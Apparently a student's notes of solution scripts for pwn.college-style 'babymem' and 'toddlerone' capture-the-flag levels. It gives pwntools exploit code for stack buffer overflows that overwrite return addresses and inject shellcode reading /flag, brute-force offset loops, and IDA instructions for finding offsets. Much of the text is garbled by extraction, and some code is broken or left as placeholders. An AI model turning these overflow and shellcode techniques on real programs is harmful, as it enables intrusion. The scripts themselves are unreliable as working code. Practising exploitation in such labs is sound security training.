‭ E: Level 2.

1‬
M
‭import pwn‬
‭with pwn.process("/challenge/babymem_level2.1") as process:‬
‭payload = b'a'*<inputBufferSize>+ <injection>.to_bytes(4, 'little')‬ ‭# see note‬
‭process.write(str(len(payload))+"\n")‬
‭process.write(payload)‬
‭print(process.readallS())‬

‭ ote: use ida to find both. for inputBufferSize, go to challenge, look under the second lea where‬
N
‭add is, should be a number with h after, convert to decimal and that is your input (mine was‬
‭28h=40). For the injection, stay in challenge but scroll all the way down till you see short‬
‭loc_1CD5, double click, and look at cmp, that hex num is going to be your injection. So mine‬
‭looked like this: payload = b'a'*40+0x21B14E3B.to_bytes(4, 'little')‬

‭ E: Level 3.1‬
M
‭from pwn import *‬
‭import pwn‬
‭pwn.context.update(arch="amd64")‬
‭pwn.context.log_level = "error"‬
‭for i in range(1, 200):‬
‭print("hello")‬
‭with pwn.process("/challenge/babymem_level3.0")as p:‬
‭p.clean()‬
‭p.send(b'10000')‬
‭p.clean‬
‭print(i)‬
‭payload = b'A'*i‬
‭payload += p32(hexvalue)‬ ‭# see note‬
‭p.write(payload)‬
‭out = p.clean().decode()‬
‭if "pwn" in out:‬
‭print(out)‬

‭ ote: to find the hex value go to ida, to the win function, decompile it, then‬
N
‭click on the puts where it says (“You win! Here is your flag”) and the number at the bottom of‬
‭your screen is your hex value. So mine was (401F57) but I put 0x401F57 in the actual code‬

‭ E: Level 6.1‬
M
‭from pwn import *‬
‭import pwn‬

‭pwn.context.update(arch="amd64")‬

‭pwn.context.log_level = "error"‬
‭for i in range(0, 200):‬

‭ rint(i)‬
p
‭for s in range(40):‬
‭with pwn.process("/challenge/babymem_level6.1") as p:‬
‭p.clean()‬
‭p.sendline('10000')‬
‭p.clean‬
‭print(i)‬
‭payload = b'\x00' * 1st val + b'2nd val'‬ ‭# find in ida‬
‭p.write(payload)‬
‭out = p.readallS()‬
‭if "pwn" in out:‬
‭print(out)‬
‭break‬
‭To find 1st val:‬
‭1.‬ ‭Go to ida‬
‭2.‬ ‭Navigate to the challenge function on the left‬
‭3.‬ ‭Find the first "add rsp, 0xFFFFFFFFFFFFFFFFFFF??h" line‬
‭4.‬ ‭The ?? is your hex value. Simply convert to decimal, add 8 to it, and then convert that‬
‭back to hex (important)‬
‭5.‬ ‭If you didn’t have the above line and it is sub instead, follow the steps to find the 1st‬
‭value in levels 7.0/7.1‬
‭6.‬ ‭This is your 1st val‬

‭To find 2nd val:‬

‭1.‬ ‭Navigate to the win function‬
‭2.‬ ‭Click on the blue space and press “tab” to decompile‬
‭3.‬ ‭Click once on the “puts”‬
‭4.‬ ‭This should give you a 6-digit hex number, this is your second val‬
‭5.‬ ‭Format as such \xHH\xHH\xHH, where H is a hex value‬
‭a.‬ ‭note that when inputting these hex values, you want to go backwards, so for‬
‭example, if your 2nd value is 4022B8, you would format it as \xB8\x22\x40‬
‭ E: Level 7.0/7.1‬
M
‭from pwn import *‬
‭import pwn‬
‭pwn.context.update(arch="amd64")‬
‭pwn.context.log_level = "error"‬
‭for i in range(40):‬
‭with process("/challenge/babymem_level7.0") as p:‬
‭p.clean()‬
‭p.sendline(b'10000')‬
‭p.clean‬
‭print(i)‬
‭payload = b"a" * 1st val‬ ‭# find in ida‬
‭payload += b'2nd val‬ ‭# find in ida‬
‭p.write(payload)‬
‭out = p.readallS()‬
‭if "pwn" in out:‬
‭print(out)‬
‭break‬
‭To find 1st value:‬
‭1.‬ ‭Go to ida and navigate to the challenge function on the left‬
‭2.‬ ‭Find the following var next to lea and right click on it‬
‭3.‬ ‭Click on the little box with 10 inside of it to convert to decimal‬
‭4.‬ ‭Add 8 to this number‬
‭To find 2nd value:‬
‭1.‬ ‭Now navigate to the win function‬
‭2.‬ ‭Click on the blue space and press “tab” to decompile‬
‭3.‬ ‭Click once on “puts” in order to get your hex‬
‭4.‬ ‭Format like \xHH\xHH, where H represents a hex number‬

‭ E: Level 8.0/8.1‬
M
‭from pwn import *‬
‭import pwn‬

‭pwn.context.update(arch="amd64")‬

‭pwn.context.log_level = "error"‬

‭for i in range(0, 200):‬

‭ rint(i)‬
p
‭for s in range(40):‬
‭with pwn.process("/challenge/babymem_level8.0") as p:‬
‭p.clean()‬
‭p.sendline('10000')‬
‭p.clean‬
‭print(i)‬
‭payload = b'\x00' * 1st val + b'2nd val'‬ ‭# find in ida like level 7‬
 ‭ .write(payload)‬
p
‭out = p.readalls()‬
‭if "pwn" in out:‬
‭print(out)‬
‭break‬

‭ME: Level 10.0‬

‭1.‬ ‭Run the challenge using‬
‭a.‬ ‭/challenge/babymem_level10.0‬
‭2.‬ ‭Write down the buffer size‬
‭3.‬ ‭Enter the buffer size when it asks for the payload‬
‭4.‬ ‭Use the following website to enter a bunch of a’s, specifically 1 more than the buffer size‬
‭a.‬ ‭https://wordcounter.net/character-count‬

‭ME: Level 10.1‬

‭1.‬ ‭Same concept as 10.0, but this time you’ll be getting the payload size from ida‬
‭2.‬ ‭Like before, navigate to the challenge function‬
‭3.‬ ‭This time, look under the third lea, there should be an add‬
‭4.‬ ‭Convert the hex next to the add to a decimal and that will be your payload size‬
‭5.‬ ‭Repeat steps 3-4 in 10.0‬

‭ E: Level 1.0‬
P
‭1. run challenge‬
‭2. see where it says, “input buffer begins at…” and count how many lines there are from that to‬
‭the 2nd to last line, then do that number * 8 so mine is 13*8=104‬
‭3. It should say “shellcode at xxxxx!” in the help text, paste the address (xxxxx) into the template‬

f‭rom pwn import *‬

‭p = process("/challenge/toddlerone_level1.0")‬
‭context.arch="amd64"‬
‭sc = asm(f"""‬
‭{shellcraft.cat2('/flag')}‬
‭""")‬
‭p.send(sc)‬
‭size = line count you got * 8‬
‭payload = b'a'*size + p64(shellcode address it gives in the help txt)‬
‭ .send(str(len(payload)) + "\n")‬
p
‭p.send(payload)‬
‭print(p.readallS())‬

‭PE: Level 1.1‬

‭1.‬ ‭Same as 1.0, but we have to brute force the line count‬

‭while(1):‬
‭for x in range(30):‬
‭from pwn import *‬
‭p = process("/challenge/toddlerone_level1.0")‬
‭context.arch="amd64"‬
‭sc = asm(f"""‬
‭{shellcraft.cat2('/flag')}‬
‭""")‬
‭p.send(sc)‬
‭size = x * 8‬
‭payload = b'a'*size + p64(shellcode address found in ida)‬
‭p.send(str(len(payload)) + "\n")‬
‭p.send(payload)‬
‭print(p.readallS())‬

‭To find the shellcode address:‬

‭1.‬ ‭Go to ida‬
‭2.‬ ‭Navigate to the function called sub_222F‬
‭3.‬ ‭Go down until you see a comment telling what the shellcode address is‬
 ‭4.‬ ‭Paste that into the template above‬

‭ E: Level 2.0‬
P
‭1. run challenge‬
‭2. repeat step 2 from above. write it down in the template below (yes the code is different)‬

f‭rom pwn import *‬

‭context.arch = 'amd64'‬

‭sc = asm(f"""‬
‭{shellcraft.cat2('/flag')}‬
‭""")‬

‭ ad_len = number of lines * 8‬

p
‭padding = b'A' * pad_len‬
‭payload = padding + p64(shell code address) + sc‬
‭size=len(payload)‬
‭p = process('/challenge/toddlerone_level2.0')‬

‭ rint(p.recvuntil('size: '))‬
p
‭p.sendline(str(size))‬

‭ rint(p.recvuntil(b'bytes)!'))‬
p
‭p.send(payload)‬

‭p.interactive()‬

‭ . grab the address in the last line of help text and add 0x18 to it – this is shellcode address to‬
3
‭put in code template (use an online hex calculator)‬
‭* for example mine is 0x7f…fd2a8+0x18 = 0x7f…fd2c0‬
‭4. enter values into the code template from above 0x00007fffffffd2c0‬

‭ E: Level 2.1‬
P
‭This is going to be another brute force method‬
‭1.‬ ‭First, try running your code from 2.0‬
‭2.‬ ‭If that works, good for you‬
‭3.‬ ‭If not, pick a random line count between 1 and 30‬
‭4.‬ ‭Repeat until you get the flag‬
‭Results may vary‬